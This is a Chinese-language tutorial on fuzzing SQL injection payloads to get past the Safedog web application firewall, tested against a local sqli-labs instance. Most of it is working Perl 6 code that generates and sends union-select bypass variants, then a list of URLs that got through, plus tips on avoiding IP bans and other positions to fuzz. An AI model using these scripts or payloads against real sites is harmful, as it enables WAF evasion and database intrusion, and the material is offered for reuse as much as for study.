安全狗版本為: apache 4.0
網站為: php+mysql
系統: win 2003
這里只要是fuzz /*!union 跟 select*/ 之間的內容:
/*!union<FUZZ_HERE>select*/
位置很多可以選擇。
腳本語言你可以用你喜歡的, 我這里用perl6
讓我們一步步來。
枸造 exp 我用如下代碼(代碼測試用):
#!/bin/env perl6
my @fuzz_sp = '/*','*/','/*!','?','*','=','';
my @fuzz_nu = 0..9;
my @fuzz_ch = '%0a'..'%0z';
my @fuzz_all;
@fuzz_all.append(@fuzz_sp);
@fuzz_all.append(@fuzz_nu);
@fuzz_all.append(@fuzz_ch);
for @fuzz_all -> $exp {
say $exp;
}
say '-' x 30;
for @fuzz_all -> $a {
for @fuzz_all -> $b {
for @fuzz_all -> $c {
for @fuzz_all -> $d {
for @fuzz_all -> $e {
say '/*union'~$a~$b~$c~$d~$e~'select*/';
}
}
}
}
}
字符構建你想怎么構造都行, 或者下現成的文件庫, 或者看下相應的腳本語言里有沒有相應的fuzz模塊可以用。
perl6中, 寫文件沒有緩沖區了, 直接用open打開, :a 追加, 用來保存規則用, 測試代碼如下:
#!/bin/env perl6 my $file = '/home/perl/Desktop/test.txt'; my $fp = open $file, :a; my $a = 1; my $b = 2; $fp.say($a~$b); #$fp.flush; sleep(120);
在perl6中, HTTP::UserAgent模塊, get的時候, 特殊字符記得要轉成uri的編碼, 要不get時會報錯。 轉碼用 URI::Encode模塊中的 uri_encode方法轉換就行。
下面是一小段測試代碼:
use HTTP::UserAgent; use URI::Encode; my $url = 'http://192.168.235.128/sqli-labs-master/Less-1/?id=-1\''; my $payload = '/*!union/*!/*!select*/1,2,3-- -'; say uri_encode($url~$payload); #輸出輸碼結果 my $targeturl = uri_encode($url~$payload); my $ua = HTTP::UserAgent.new; my $result = $ua.get($targeturl); say $result.content; if $result.content ~~ /'Your Login name'/ { say 'Bypass!' }
測試站用的是 sqllibs。
查找相應的關鍵字, 如果存在, 就說明bypass了。
最終的fuzz版本如下:
use HTTP::UserAgent; use URI::Encode; my $url = 'http://192.168.235.128/sqli-labs-master/Less-1/?id=-1\''; #保存數據, 刷新緩沖 my $file = '/home/perl/Desktop/safedog_exp.txt'; my $fp = open $file, :a; my $ua = HTTP::UserAgent.new; my @fuzz_sp = '/*','*/','/*!','?','*','=',''; my @fuzz_nu = 0..9; my @fuzz_ch = '%0a'..'%0z'; my @fuzz_all; @fuzz_all.append(@fuzz_sp); @fuzz_all.append(@fuzz_nu); @fuzz_all.append(@fuzz_ch); for @fuzz_all -> $a { for @fuzz_all -> $b { for @fuzz_all -> $c { for @fuzz_all -> $d { for @fuzz_all -> $e { my $exp = '/*!union'~$a~$b~$c~$d~$e~'select*/1,2,3-- -'; my $targeturl = uri_encode($url~$exp); say 'Check url:'~$targeturl; #sleep(2); my $result = $ua.get($targeturl); if $result.content ~~ /'Your Login name'/ { say "Bypass!\a\a\a\a\a\a\a ---> "~ $url~$exp; $fp.say($url~$exp); sleep(5); } } } } } }
Fuzz到一些規則如下:
http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/**//*!/*!select*/1,2,3-- - http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0b*/select*/1,2,3-- - http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0e*/select*/1,2,3-- - http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0f*/select*/1,2,3-- - http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0g*/select*/1,2,3-- - http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0h*/select*/1,2,3-- - http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0i*/select*/1,2,3-- - http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0j*/select*/1,2,3-- - http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0k*/select*/1,2,3-- - http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0l*/select*/1,2,3-- - http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0m*/select*/1,2,3-- - http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0n*/select*/1,2,3-- - http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0o*/select*/1,2,3-- - http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0p*/select*/1,2,3-- -
注意:
在fuzz時, 你fuzz太快狗默認會禁IP, 或者有時網站mysql數據庫會掛掉。
你可以把狗的防CC功能/ IP黑名單關掉。
fuzz的最后:
fuzz完之后, 你可以對比一下, 看一下能過的fuzz有沒有特點的規律, 總結一下。
對於fuzz位置, 你可以在不同位置測試, 比如:
union<FUZZ_HERE>/*select <FUZZ_HERE>union<FUZZ_HERE>select /*!36000uNION<FUZZ_HERE>*/selecT ...